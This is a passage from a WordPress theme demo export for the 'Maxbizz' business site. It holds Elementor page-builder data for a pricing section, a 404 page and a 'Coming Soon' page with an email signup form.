people.<\/p>","text_color":"#FFFFFF","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"152805f","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"c53e4ac","elType":"widget","settings":{"align":"right","align_mobile":"left","text":"get in touch","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contact-us","is_external":"","nofollow":"","custom_attributes":""},"_padding":{"unit":"px","top":"5","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"dcefd1a","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-faq.jpg","id":574},"background_position":"top center","background_repeat":"no-repeat","padding":{"unit":"px","top":"100","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a866378","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3d64e18","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"2d57f68","elType":"column","settings":{"_column_size":33,"_inline_size":23,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"2e06ec7","elType":"column","settings":{"_column_size":33,"_inline_size":53.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"c669db8","elType":"widget","settings":{"sub":"flexible pricing plans","title":"Choose The Best Plan","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#FFFFFF","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"7255b73","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.<\/p>","align":"center","text_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"48","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"51bfab0","elType":"widget","settings":{"title_left":"Billed Monthly","title_right":"Billed Yearly","title_color":"#FFFFFF","toggle_bg":"#FFFFFF33"},"elements":[],"widgetType":"iswitcher"}],"isInner":true},{"id":"06865b6","elType":"column","settings":{"_column_size":33,"_inline_size":23,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"04bd296","elType":"section","settings":{"gap":"extended","structure":"30","css_classes":"monthly","layout":"full_width"},"elements":[{"id":"75f58b9","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"5d1e07a","elType":"widget","settings":{"title":"basic plan","price":"<sup>$<\/sup> 69","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li>Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"a910be5","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"14789ad","elType":"widget","settings":{"is_featured":"yes","title":"ultra plan","price":"<sup>$<\/sup> 79","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"a5e277a","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"4f90658","elType":"widget","settings":{"title":"pro plan","price":"<sup>$<\/sup> 89","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li class=\"active\">Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true}],"isInner":true},{"id":"e676d1e","elType":"section","settings":{"gap":"extended","structure":"30","css_classes":"yearly","layout":"full_width"},"elements":[{"id":"9729d97","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"194320d","elType":"widget","settings":{"title":"basic plan","price":"<sup>$<\/sup> 699","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li>Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"88ccea0","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"148d950","elType":"widget","settings":{"is_featured":"yes","title":"ultra plan","price":"<sup>$<\/sup> 799","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"d27a889","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"4fc8771","elType":"widget","settings":{"title":"pro plan","price":"<sup>$<\/sup> 899","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li class=\"active\">Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"5ef0e76","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false}},"elements":[{"id":"789c4a0","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b5a1c52","elType":"widget","settings":{"image_carousel":[{"_id":"46a0442","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01.svg","id":583},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"24adf3d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02.svg","id":584},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"90b7ac2","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03.svg","id":585},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04.svg","id":586},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"cb5bb18"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05.svg","id":587},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"e595c69"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06.svg","id":588},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"6fa2f0f"}],"tshow":"6","tshow_tablet":"4","dots":"false","img_spacing":{"unit":"px","size":80,"sizes":[]},"img_css_filters_hover_css_filter":"custom","img_css_filters_hover_brightness":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"iclogos"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:6:"column";a:3:{s:5:"count";i:19;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:19;s:19:"_inline_size_tablet";i:12;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:2;s:13:"margin_mobile";i:2;}}}}s:8:"iheading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:2;s:5:"title";i:2;s:11:"header_size";i:2;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:13:"style_section";a:8:{s:9:"stitle_bg";i:2;s:27:"title_typography_typography";i:2;s:33:"title_typography_font_size_mobile";i:2;s:28:"stitle_typography_typography";i:2;s:27:"stitle_typography_font_size";i:2;s:12:"stitle_color";i:2;s:29:"stitle_typography_font_weight";i:2;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:5:"align";i:2;s:10:"text_color";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_mobile";i:1;s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:6;}s:14:"section_layout";a:3:{s:6:"layout";i:5;s:3:"gap";i:5;s:16:"content_position";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:7:"padding";i:6;s:14:"padding_mobile";i:2;s:11:"css_classes";i:2;}}s:5:"style";a:1:{s:18:"section_background";a:5:{s:21:"background_background";i:2;s:16:"background_image";i:2;s:19:"background_position";i:2;s:17:"background_repeat";i:2;s:15:"background_size";i:1;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:2;s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:1:{s:5:"title";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:1;s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:4:{s:5:"align";i:1;s:12:"align_mobile";i:1;s:4:"text";i:1;s:4:"link";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:9:"iswitcher";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"title_left";i:1;s:11:"title_right";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:2:{s:11:"title_color";i:1;s:9:"toggle_bg";i:1;}}}}s:13:"ipricingtable";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:5:"title";i:6;s:5:"price";i:6;s:9:"price_for";i:6;s:7:"details";i:6;s:11:"is_featured";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:4;}}s:5:"style";a:1:{s:21:"style_content_section";a:2:{s:27:"price_typography_typography";i:6;s:28:"price_typography_font_family";i:6;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}s:5:"style";a:1:{s:19:"image_style_section";a:3:{s:11:"img_spacing";i:1;s:32:"img_css_filters_hover_css_filter";i:1;s:32:"img_css_filters_hover_brightness";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>404</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/404-2/</link>
		<pubDate>Wed, 09 Sep 2020 03:33:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=597</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-corporate/">
					<img src="https://maxbizz.s3.amazonaws.com/images/04_White.svg" alt="Maxbizz Corporate">
				</a>			        
			<h1>404</h1>		
			<h2>Sorry! Page Not Found!</h2>		
		<p>Oops! The page you are looking for does not exist. Please return to the site’s homepage.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz-business/">TAKE ME HOME</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>597</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:33:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:33:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[404-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"dc90a5e","elType":"section","settings":{"height":"full","content_position":"middle","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg-404.jpg","id":599},"css_classes":"error-404","vlines_class":"","vnumber_line":"no-lines-vertical-center","vzindex":"","vline1_color":"","vline2_color":"","vline3_color":"","hlines_class":"","hnumber_line":"both","hzindex":"","hline1_color":"","hline2_color":""},"elements":[{"id":"ab481db","elType":"column","settings":{"_column_size":100,"_inline_size":null,"align":"center","_ot_content_align":""},"elements":[{"id":"ff9a571","elType":"widget","settings":{"align":"center","logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04_White.svg","id":2102},"logo_width":{"unit":"px","size":140,"sizes":[]},"_position":"fixed","_offset_x":{"size":0,"unit":"px"},"_offset_y":{"size":70,"unit":"px"},"_offset_y_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"ilogo"},{"id":"2a1d1ef","elType":"widget","settings":{"title":"404","header_size":"h1","align":"center","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":180,"sizes":[]},"typography_font_weight":"300","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":80,"sizes":[]},"typography_font_family":"Open Sans","typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"6bd4e37","elType":"widget","settings":{"title":"Sorry! Page Not Found!","align":"center","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":42,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":34,"sizes":[]},"typography_line_height_mobile":{"unit":"em","size":1.1999999999999999555910790149937383830547332763671875,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"02eb208","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"vlines_class":"","vnumber_line":"no-lines-vertical-center","vzindex":"","vline1_color":"","vline2_color":"","vline3_color":"","hlines_class":"","hnumber_line":"both","hzindex":"","hline1_color":"","hline2_color":""},"elements":[{"id":"b70cb7b","elType":"column","settings":{"_column_size":33,"_inline_size":30,"_inline_size_tablet":20},"elements":[],"isInner":true},{"id":"2ca71f3","elType":"column","settings":{"_column_size":33,"_inline_size":38.88900000000000289901436190120875835418701171875,"_inline_size_tablet":60},"elements":[{"id":"c0b5c0b","elType":"widget","settings":{"editor":"<p>Oops! The page you are looking for does not exist. Please return to the site\u2019s homepage.<\/p>","align":"center","text_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":18,"sizes":[]},"column_gap":{"unit":"%","size":"","sizes":[]},"_element_custom_width":{"unit":"px","size":425,"sizes":[]},"typography_font_size_mobile":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"1958c9e","elType":"column","settings":{"_column_size":33,"_inline_size":30.77499999999999857891452847979962825775146484375,"_inline_size_tablet":20},"elements":[],"isInner":true}],"isInner":true},{"id":"c047923","elType":"widget","settings":{"_css_classes":"page-content","_margin":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"wp-widget-search"},{"id":"64444b7","elType":"widget","settings":{"align":"center","text":"TAKE ME HOME","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-business\/","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","background_color":"","border_color":""},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:7:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:5:"align";i:1;s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:17:"_section_position";a:4:{s:9:"_position";i:1;s:9:"_offset_x";i:1;s:9:"_offset_y";i:1;s:16:"_offset_y_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:3:{s:5:"title";i:2;s:11:"header_size";i:1;s:5:"align";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:8:{s:11:"title_color";i:2;s:21:"typography_typography";i:2;s:20:"typography_font_size";i:2;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_family";i:1;s:22:"typography_line_height";i:1;s:29:"typography_line_height_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:4:{s:12:"_inline_size";i:4;s:19:"_inline_size_tablet";i:3;s:5:"align";i:1;s:17:"_ot_content_align";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:1;s:10:"column_gap";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:5:"align";i:1;s:10:"text_color";i:1;s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:27:"typography_font_size_mobile";i:1;}}s:8:"advanced";a:1:{s:17:"_section_position";a:1:{s:21:"_element_custom_width";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:6:"layout";i:1;s:3:"gap";i:1;s:6:"height";i:1;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:1;s:11:"css_classes";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_image";i:1;}}}}s:16:"wp-widget-search";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:1;s:7:"_margin";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:3:{s:5:"align";i:1;s:4:"text";i:1;s:4:"link";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Coming Soon</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/coming-soon/</link>
		<pubDate>Wed, 09 Sep 2020 03:45:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=604</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-business/">
							<img src="https://maxbizz.s3.amazonaws.com/images/04_Black.svg" alt="" loading="lazy" />								</a>
			<h2>Maxbizz is in the Works!</h2>		
		<ul data-zone="0" data-date="2021/11/20 12:00" data-day="Day" data-days="Days" data-hour="Hour" data-hours="Hours" data-min="Minute" data-mins="Minutes" data-second="Second" data-seconds="Seconds">
			<li>00<p>Days</p></li>
			<li>:</li>
			<li>00<p>Hours</p></li>
			<li>:</li>
			<li>00<p>Minutes</p></li>
			<li>:</li>
			<li>00<p>Seconds</p></li>
		</ul>
		<p>We are about to go live so watch this space!</p>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-corporate/wp-admin/admin-ajax.php#wpcf7-f610-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="610" />
<input type="hidden" name="_wpcf7_version" value="5.3" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f610-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><button>Sign Up</button>
</form>		
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>604</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:45:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:45:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[coming-soon]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
